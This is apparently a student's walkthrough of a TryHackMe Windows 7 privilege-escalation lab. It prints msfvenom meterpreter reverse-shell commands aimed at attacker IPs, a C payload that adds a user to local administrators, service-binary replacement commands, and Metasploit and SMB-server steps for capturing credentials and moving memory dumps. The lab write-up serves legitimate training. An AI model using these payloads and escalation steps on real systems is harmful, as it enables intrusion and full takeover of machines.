Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321
THM Room https://tryhackme.com/room/windowsprivescarena
TASK 1 : Connecting to TryHackMe network
I’ve read the intro and deployed the attached virtual machine.
No Answer
TASK 2 : Deploy the vulnerable machine
Deploy the machine and log into the user account via RDP
No Answer
Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?
User
Answer : TCM
TASK 3 : Registry Escalation - Autorun
Click ‘Completed’ once you have successfully elevated the machine
First, i looked at autoruns64.exe for “program.exe”, then i checked with accesschk that the group “Everyone” has the “FILE_ALL_ACCESS” permission :
Permission
After building a program.exe reverse with msfvenom on the attacker machine :
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.135.148 -f exe -o program.exe
I uploaded this in the “C:\Program Files\Autorun Program” directory. (Via python3 HTTP server on attacker)
Then launched a handler in Metasploit and relogged to an admin session to simulate an adminsitrator connexion :
Meterpreter
I got an active meterpreter session. Let’s checked ithe user groups :
Groups
No Answer.
TASK 4 : Registry Escalation - AlwaysInstallElevated
Click ‘Completed’ once you have successfully elevated the machine
First, looking the registry key is well set to 1 :
AlwaysInstallElevated Registry Key
Then creating a msi reverse shell installer with msfvenom :
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.199.49 lport=4545 -f msi -o setup.msi
With a simle HTTP python Server , i downloaded the file on the target then ran the command :
Download Malicious File
In the Metasploit listener previously launched, i receive a shell with system rights :
Reverse shell
No Answer.
TASK 5 : Service Escalation - Registry
Click ‘Completed’ once you have successfully elevated the machine
Permissions
Compiled the c code with the changes to the system function into x.exe :
1
2
3
4
5
6
7
8
9
[...]
//add the payload here
int Run()
{
//system("whoami > c:\\windows\\temp\\service.txt");
system("cmd.exe /k net localgroup administrators user /add");
return 0;
}
[...]
x.exe
Then adding x.exe on target and launching the service :
Whoami
We can see that our local user has been added to the local administrators group.
No Answer.
TASK 6 : Service Escalation - Executable Files
Click ‘Completed’ once you have successfully elevated the machine
Detection of vulnerability :
Detection
The filepermservice.exe file has “FILE_ALL_ACCESS” permission for Everyone set.
Exploitation : Using the x.exe file used previously, and copied it to filepermservice.exe to replace it.
1
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
Then starting the service :
1
sc start filepermsvc
We now have the user added to the local administrators group :
Verification
No Answer
TASK 7 : Privilege Escalation - Startup Applications
Click ‘Completed’ once you have successfully elevated the machine
New payload generated :
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.199.49 LPORT=53 -f exe -o x.exe
Detection :
Verification
Users has F (full access) persmission on the Startup folder as intended.
Exploitation :
Let’s download our new exe file to this folder.
y.exe
Then when logged to an admin user, i received a privileges shell :
Verification
No Answer
TASK 8 : Service Escalation - DLL Hijacking
Click ‘Completed’ once you have successfully elevated the machine
First, i created the modified dll from the given file :
windows_dll.c
Then restarted the dllsvc service :
Service Restart
No Answer.
TASK 9 : Service Escalation - binPath
Click ‘Completed’ once you have successfully elevated the machine
First, checked that the user has the “SERVICE_CHANGE_CONFIG” permission set :
Permissions
Then adding our user to local admin group :
Local admin group
No Answer
TASK 10 : Service Escalation - Unquoted Service Paths
Click ‘Completed’ once you have successfully elevated the machine
Checking i can exploit an unquoted path :
unquoted path
Built a exe file adding user to local admin group :
common.exe
Launching the exploit :
Exploit
No Answer
TASK 11 : Potato Escalation - Hot Potato
Click ‘Completed’ once you have successfully elevated the machine
“Hot potato is the code name of a Windows privilege escalation technique that was discovered by Stephen Breen. This technique is actually a combination of two known windows issues like NBNS spoofing and NTLM relay with the implementation of a fake WPAD proxy server which is running locally on the target host.” _pentesterlab.blog https://pentestlab.blog/2017/04/13/hot-potato/
Executing the provide script for Hot Potato exploit :
Exploit
It added our user to the local adminsitrator group.
No Answer.
TASK 12 : Password Mining Escalation - Configuration Files
What is the cleartext password found in Unattend.xml?
Unexpected password found in xml configuration file :
Configuration File
It’s base64 encode, so i need to decode it :
Decoded Password
Answer : password123
TASK 13 : Password Mining Escalation - Memory
Click ‘Completed’ once you have successfully found all the passwords
Started msfconsole and used following commands :
1
2
3
4
use auxiliary/server/capture/http_basic
set uripath x
set SRVPORT 8888
run
Then i explored on the windows target http://10.10.199.49:8888/x and got an error while connecting. So, i created a dump file from the internet explorer via the Taskmanager :
Dump
Dumping process
Dumping process 2
Next i ran a smb server on kali :
1
sudo python3 /opt/impackets/examples/smbserver.py kali .
so i could transfert the dump files from Windows to the Kali machine :
Transfer dump
The command strings didn’t return anything :
1
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
But in the Metasploit capture, i got the password captured :
EXploit
No Answer
TASK 14 : Privilege Escalation - Kernel Exploits
Click ‘Completed’ once you have successfully elevated the machine
The msfvenom payload kept crashing for me, event changing settings like encoder or architecture.
When the reverse shell was established, it instantly died.
No Answer